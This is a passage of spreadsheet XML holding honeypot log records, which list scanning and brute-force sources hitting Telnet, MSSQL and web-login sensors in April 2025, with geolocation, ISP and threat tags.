'None'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '45.14.244.111', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b068"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1564"/>
    <x v="1564"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:51:17"/>
    <d v="2025-04-15T22:28:09"/>
    <d v="2025-04-16T02:51:17"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:ca91"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1565"/>
    <x v="1565"/>
    <s v="finc-23-b2-v4wan-160999-cust938.vm7.cable.virginm.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:50:00"/>
    <d v="2025-04-16T02:48:10"/>
    <d v="2025-04-16T02:50:00"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="Cricklewood"/>
    <s v="2651984"/>
    <s v="NA"/>
    <s v="51.5567"/>
    <s v="-0.21549000000000001"/>
    <s v="5089"/>
    <s v="Virgin Media Limited"/>
    <s v="Virgin Media"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:5211:b7ab"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1566"/>
    <x v="1566"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:38:08"/>
    <d v="2025-04-15T21:27:15"/>
    <d v="2025-04-16T02:38:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:53ef"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1567"/>
    <x v="1567"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:28:04"/>
    <d v="2025-04-16T02:27:41"/>
    <d v="2025-04-16T02:28:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PR"/>
    <s v="Paraná"/>
    <s v="Londrina"/>
    <s v="Londrina"/>
    <s v="3458449"/>
    <s v="NA"/>
    <s v="-23.3103"/>
    <s v="-51.1628"/>
    <s v="27699"/>
    <s v="TELEFÔNICA BRASIL S.A"/>
    <s v="Vivo"/>
    <s v="business"/>
    <s v="TELEF�NICA BRASIL S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb74:70ca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1568"/>
    <x v="1568"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:25:32"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-16T02:25:32"/>
    <n v="104"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H34&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;17609&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="VIETELxdsl"/>
    <s v="residential"/>
    <s v="xDSL Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:734a:e88b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1569"/>
    <x v="1569"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:22:37"/>
    <d v="2025-03-30T17:39:33"/>
    <d v="2025-04-16T02:22:37"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="PE"/>
    <s v="Peru"/>
    <s v="LIM"/>
    <s v="Lima region"/>
    <s v="Lima"/>
    <s v="Villa Poeta José Gálvez Barrenechea"/>
    <s v="3937547"/>
    <s v="NA"/>
    <s v="-12.2131"/>
    <s v="-76.9052"/>
    <s v="269862"/>
    <s v="M &amp; B Soluciones Peru S.A.C. (FASTNET)"/>
    <s v="OPTIC"/>
    <s v="business"/>
    <s v="Fibramax Internet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8a63:b39b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1570"/>
    <x v="1570"/>
    <s v="NA&amp;&amp;45.178.248.115.universotecnologiainternet.com.br"/>
    <x v="0"/>
    <d v="2025-04-16T02:14:12"/>
    <d v="2025-04-05T05:10:01"/>
    <d v="2025-04-16T02:14:12"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Mateus Leme"/>
    <s v="Mateus Leme"/>
    <s v="3457484"/>
    <s v="NA"/>
    <s v="-19.9864"/>
    <s v="-44.4278"/>
    <s v="269051"/>
    <s v="UNIVERSO FIBER COMUNICACAO MULTIMIDIA"/>
    <s v="Universo Fiber Comunicacao Multimidia"/>
    <s v="residential"/>
    <s v="Universo Fiber Comunicacao Multimidia"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2db2:f873"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1571"/>
    <x v="1571"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:09:01"/>
    <d v="2025-04-16T02:09:01"/>
    <d v="2025-04-16T02:09:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BSNL GSM NorthZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:3331"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1572"/>
    <x v="1572"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:07:24"/>
    <d v="2025-04-15T15:14:55"/>
    <d v="2025-04-16T02:07:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e7:8d2f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1573"/>
    <x v="1573"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T01:53:53"/>
    <d v="2024-04-12T17:34:00"/>
    <d v="2025-04-16T01:53:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="13909&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fd:d06d"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1574"/>
    <x v="1574"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T01:43:58"/>
    <d v="2025-04-16T01:43:58"/>
    <d v="2025-04-16T01:43:58"/>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c:eb29"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1575"/>
    <x v="1575"/>
    <s v="mx-ll-223.206.76-121.dynamic.3bb.co.th&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T01:39:47"/>
    <d v="2025-04-16T01:36:31"/>
    <d v="2025-04-16T01:39:47"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="90"/>
    <s v="Songkhla"/>
    <s v="Hat Yai"/>
    <s v="Hat Yai"/>
    <s v="1610780"/>
    <s v="NA"/>
    <s v="7.00836"/>
    <s v="100.477"/>
    <s v="45758"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="residential"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="2010-07-12"/>
    <s v="TTBP-TH"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfce:4c79"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1576"/>
    <x v="1576"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T01:04:53"/>
    <d v="2025-04-15T03:05:26"/>
    <d v="2025-04-16T01:04:53"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.29229"/>
    <s v="103.808"/>
    <s v="9506"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="residential"/>
    <s v="Singtel Fibre"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:806a:e1ff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1577"/>
    <x v="1577"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T00:58:23"/>
    <d v="2025-04-16T00:32:21"/>
    <d v="2025-04-16T00:58:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="395003"/>
    <s v="21.1702"/>
    <s v="72.8311"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d4:de99"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1578"/>
    <x v="1578"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T00:34:40"/>
    <d v="2025-04-16T00:34:40"/>
    <d v="2025-04-16T00:34:40"/>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d6:3ded"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1579"/>
    <x v="1579"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T00:25:25"/>
    <d v="2025-04-16T00:25:25"/>
    <d v="2025-04-16T00:25:25"/>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3:8ed2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1580"/>
    <x v="1580"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T00:20:16"/>
    <d v="2025-04-16T00:20:16"/>
    <d v="2025-04-16T00:20:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="QA"/>
    <s v="Qatar"/>
    <s v="DA"/>
    <s v="Baladīyat ad Dawḩah"/>
    <s v="NA"/>
    <s v="Doha"/>
    <s v="290030"/>
    <s v="NA"/>
    <s v="25.2854"/>
    <s v="51.531"/>
    <s v="48728"/>
    <s v="vodafoneqatar"/>
    <s v="Vodafone Qatar P.Q.S.C"/>
    <s v="corporate"/>
    <s v="Vodafoneqatar"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25ba:3407"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1581"/>
    <x v="1581"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T00:18:32"/>
    <d v="2025-02-13T15:19:23"/>
    <d v="2025-04-16T00:18:32"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:d098"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1582"/>
    <x v="1582"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T00:11:12"/>
    <d v="2025-04-16T00:11:12"/>
    <d v="2025-04-16T00:11:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="North Lincolnshire"/>
    <s v="Winterton"/>
    <s v="2633786"/>
    <s v="NA"/>
    <s v="53.655"/>
    <s v="-0.59885"/>
    <s v="62044"/>
    <s v="ZSCALER-EMEA"/>
    <s v="Zscaler Switzerland GmbH"/>
    <s v="corporate"/>
    <s v="Zscaler Man1"/>
